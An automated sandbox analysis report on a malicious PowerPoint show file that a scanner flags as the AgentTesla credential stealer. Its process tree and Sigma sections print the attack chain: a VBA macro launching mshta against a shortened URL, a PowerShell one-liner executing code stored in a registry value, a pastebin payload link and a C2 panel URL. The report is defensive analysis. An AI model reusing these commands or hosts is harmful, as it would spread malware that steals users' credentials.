Loading ...

Play interactive tourEdit tour

Analysis Report Scan emco Bautechni specification.pps

Overview

General Information

Sample Name:Scan emco Bautechni specification.pps
MD5:d46764d26e05e9056d0a410ae2f9d077
SHA1:a5e439de27ad3a594bae78fd4bbd4743f9f9acfa
SHA256:7eafb57e7fc301fabb0ce3b98092860aaac47b7118804bb8d84ddb89b9ee38f3

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Powershell execute code from registry
Yara detected AgentTesla
Connects to a URL shortener service
Connects to a pastebin service (likely for C&C)
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates processes via WMI
Document contains an embedded VBA macro which may execute processes
Document exploit detected (process start blacklist hit)
Installs a global keyboard hook
Modifies the context of a thread in another process (thread injection)
Modifies the hosts file
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Adds / modifies Windows certificates
Allocates a big amount of memory (probably used for heap spraying)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Domain name seen in connection with other malware
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w7
  • POWERPNT.EXE (PID: 3740 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /AUTOMATION -Embedding MD5: 0F144ECA8CFEC8882A3809D176886255)
  • cmd.exe (PID: 3820 cmdline: C:\Windows\system32\cmd.exe /c 'C:\Users\user\Desktop\Scan emco Bautechni specification.pps' MD5: AD7B9C14083B52BC532FBA5948342B98)
    • POWERPNT.EXE (PID: 3860 cmdline: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /s 'C:\Users\user\Desktop\Scan emco Bautechni specification.pps' MD5: 0F144ECA8CFEC8882A3809D176886255)
      • mshta.exe (PID: 3936 cmdline: 'C:\Windows\System32\mshta.exe' 'http:\\j.mp\dmdmcrcrcryctcgufyguhmd' MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
  • powershell.exe (PID: 4092 cmdline: powershell ((gp HKCU:\Software).Fucku)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • InstallUtil.exe (PID: 2612 cmdline: {path} MD5: F9EFD49DCC1AC028017D82022D2311B0)
  • mshta.exe (PID: 2112 cmdline: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).Fucku)|IEX'', 0 : window.close') MD5: ABDFC692D9FE43E2BA8FE6CB5A8CB95A)
    • powershell.exe (PID: 2316 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • InstallUtil.exe (PID: 2396 cmdline: {path} MD5: F9EFD49DCC1AC028017D82022D2311B0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.1027384674.00402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    0000000F.00000002.1223509235.00402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000F.00000002.1224722153.01A60000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: InstallUtil.exe PID: 2396JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: InstallUtil.exe PID: 2612JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            15.2.InstallUtil.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              16.2.InstallUtil.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                Sigma Overview


                System Summary:

                barindex
                Sigma detected: Powershell execute code from registryShow sources
                Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).Fucku)|IEX'', 0 : window.close'), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2112, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, ProcessId: 2316
                Sigma detected: MSHTA Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\system32\mshta.exe' vbscript:Execute('CreateObject(''Wscript.Shell'').Run ''powershell ((gp HKCU:\Software).Fucku)|IEX'', 0 : window.close'), ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2112, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' ((gp HKCU:\Software).Fucku)|IEX, ProcessId: 2316
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: 'C:\Windows\System32\mshta.exe' 'http:\\j.mp\dmdmcrcrcryctcgufyguhmd', CommandLine: 'C:\Windows\System32\mshta.exe' 'http:\\j.mp\dmdmcrcrcryctcgufyguhmd', CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE' /s 'C:\Users\user\Desktop\Scan emco Bautechni specification.pps', ParentImage: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE, ParentProcessId: 3860, ProcessCommandLine: 'C:\Windows\System32\mshta.exe' 'http:\\j.mp\dmdmcrcrcryctcgufyguhmd', ProcessId: 3936

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Multi AV Scanner detection for domain / URLShow sources
                Source: http://j.mp/dmdmcrcrcryctcgufyguhmdVirustotal: Detection: 7%Perma Link
                Multi AV Scanner detection for submitted fileShow sources
                Source: Scan emco Bautechni specification.ppsVirustotal: Detection: 69%Perma Link
                Source: Scan emco Bautechni specification.ppsReversingLabs: Detection: 67%

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user

                Software Vulnerabilities:

                barindex
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\mshta.exe
                Source: powerpnt.exeMemory has grown: Private usage: 0MB later: 8MB

                Networking:

                barindex
                Connects to a URL shortener serviceShow sources
                Source: unknownDNS query: name: j.mp
                Connects to a pastebin service (likely for C&C)Show sources
                Source: unknownDNS query: name: pastebin.com
                Source: unknownDNS query: name: pastebin.com
                Source: unknownDNS query: name: pastebin.com
                Source: unknownDNS query: name: pastebin.com
                Source: unknownDNS query: name: pastebin.com
                Source: Joe Sandbox ViewDomain Name: j.mp j.mp
                Source: Joe Sandbox ViewIP Address: 104.23.99.190 104.23.99.190
                Source: Joe Sandbox ViewIP Address: 104.23.99.190 104.23.99.190
                Source: Joe Sandbox ViewIP Address: 67.199.248.16 67.199.248.16
                Source: Joe Sandbox ViewASN Name: unknown unknown
                Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
                Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                Source: global trafficHTTP traffic detected: GET /dmdmcrcrcryctcgufyguhmd HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 3.21.149.255
                Source: unknownTCP traffic detected without corresponding DNS query: 3.21.149.255
                Source: unknownTCP traffic detected without corresponding DNS query: 3.21.149.255
                Source: unknownTCP traffic detected without corresponding DNS query: 3.21.149.255
                Source: unknownTCP traffic detected without corresponding DNS query: 3.21.149.255
                Source: unknownTCP traffic detected without corresponding DNS query: 3.21.149.255
                Source: unknownTCP traffic detected without corresponding DNS query: 3.21.149.255
                Source: unknownTCP traffic detected without corresponding DNS query: 3.21.149.255
                Source: unknownTCP traffic detected without corresponding DNS query: 3.21.149.255
                Source: unknownTCP traffic detected without corresponding DNS query: 3.21.149.255
                Source: unknownTCP traffic detected without corresponding DNS query: 3.21.149.255
                Source: C:\Windows\System32\mshta.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B18OHZEN\dmdmcrcrcryctcgufyguhmd[1].htmJump to behavior
                Source: global trafficHTTP traffic detected: GET /dmdmcrcrcryctcgufyguhmd HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: j.mpConnection: Keep-Alive
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: unknownDNS traffic detected: queries for: j.mp
                Source: InstallUtil.exe, 0000000F.00000002.1225241519.01D02000.00000004.00000001.sdmpString found in binary or memory: http://3.21.149.255
                Source: InstallUtil.exe, 0000000F.00000002.1225241519.01D02000.00000004.00000001.sdmpString found in binary or memory: http://3.21.149.255/webpanel/5/inc/1771f778463597.php
                Source: InstallUtil.exe, 0000000F.00000002.1224722153.01A60000.00000004.00000001.sdmpString found in binary or memory: http://3.21.149.255x&7k
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudFlareIncECCCA-2.crt0
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: mshta.exe, 00000005.00000003.781080248.001DB000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudFlareIncECCCA2.crl06
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudFlareIncECCCA2.crl0L
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://j.mp/
                Source: mshta.exe, 00000005.00000002.884031695.00133000.00000004.00000020.sdmpString found in binary or memory: http://j.mp/dmdmcrcrcryctcgufyguhmd
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: InstallUtil.exe, 0000000F.00000002.1224722153.01A60000.00000004.00000001.sdmpString found in binary or memory: https://FVGmXuB4VHYmlkm6XZpF.com
                Source: InstallUtil.exe, 0000000F.00000002.1224722153.01A60000.00000004.00000001.sdmpString found in binary or memory: https://FVGmXuB4VHYmlkm6XZpF.comP
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp, dmdmcrcrcryctcgufyguhmd[1].htm.5.drString found in binary or memory: https://pastebin.com/raw/Bnv7ruYp
                Source: mshta.exe, 00000005.00000003.781080248.001DB000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/Bnv7ruYp...
                Source: mshta.exe, 00000005.00000003.781080248.001DB000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/Bnv7ruYp....p
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmp, mshta.exe, 00000005.00000002.925219414.001A5000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/Bnv7ruYpWebKit/536.5
                Source: mshta.exe, 00000005.00000002.896937022.00155000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/Bnv7ruYpcku)
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/Bnv7ruYpd
                Source: mshta.exe, 00000005.00000003.775267366.02B82000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/Bnv7ruYphttps://pastebin.com/raw/Bnv7ruYp
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/Bnv7ruYprC:
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: https://pastebin.com/raw/Bnv7ruYpu
                Source: mshta.exe, 00000005.00000003.781080248.001DB000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudfl
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: mshta.exe, 00000005.00000003.780896377.001A5000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 49159 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49160 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49161 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49159
                Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49162 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49162
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49161
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49160

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                barindex
                Installs a global keyboard hookShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
                Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
                Source: C:\Windows\System32\mshta.exeWindow created: window name: CLIPBRDWNDCLASS
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeWindow created: window name: CLIPBRDWNDCLASS

                Spam, unwanted Advertisements and Ransom Demands:

                barindex
                Modifies the hosts fileShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

                System Summary:

                barindex
                Document contains an embedded VBA macro which may execute processesShow sources
                Source: Scan emco Bautechni specification.ppsOLE, VBA macro line: Shell "curl"
                Source: VBA code instrumentationOLE, VBA macro: Module Slide, Function Page, API IWshShell3.Run(""mshta""http:\\j.mp\dmdmcrcrcryctcgufyguhmd"")
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_0028B362 NtQuerySystemInformation,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_0028B331 NtQuerySystemInformation,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_00B6F210
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_00B6DBF8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_00B6E3E8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_00B6E835
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_00B6E791
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_00B6F200
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA1FF2
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA8B36
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AAA70C
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AAB280
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA4A70
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA51A8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA0910
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AAE948
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA74F0
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA9038
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA0070
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA2FAC
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA33A0
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA33F7
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA2FF5
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA4F68
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA3349
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA4F58
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA1FF2
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA329B
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA32F2
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA2ACB
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA4A68
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA5648
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA3244
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA6DB8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA5198
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA3196
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA31ED
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA293F
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA313F
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA90A8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA34A5
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA30E8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA34FC
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA9028
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA344E
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AA304C
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_03AAA857
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B4C18
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B4A1C
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B015E
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B2641
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B3B40
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B0568
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B1288
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B1BE0
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B0F0A
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B4C08
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B5938
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B3B30
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B5929
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B0558
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B1278
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B2868
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B34A0
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_041B08D8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_0427C008
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_0427F108
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_0427D248
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_0427E258
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_0427C758
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 15_2_0427F9A8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 16_2_00B2DBF8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 16_2_00B2E3E8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 16_2_00B2E835
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exeCode function: 16_2_00B2E791
                Source: Scan emco Bautechni specification.ppsOLE, VBA macro line: Sub Auto_Close()
                Source: VBA code instrumentationOLE, VBA macro: Module Calculator, Function Auto_Close
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: 15.2.InstallUtil.exe.400000.0.unpack, xgw.csCryptographic APIs: 'TransformFinalBlock'
                Source: 15.2.InstallUtil.exe.400000.0.unpack, xgw.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                Source: 16.2.InstallUtil.exe.400000.0.unpack, xgw.csCryptographic APIs: 'TransformFinalBlock'
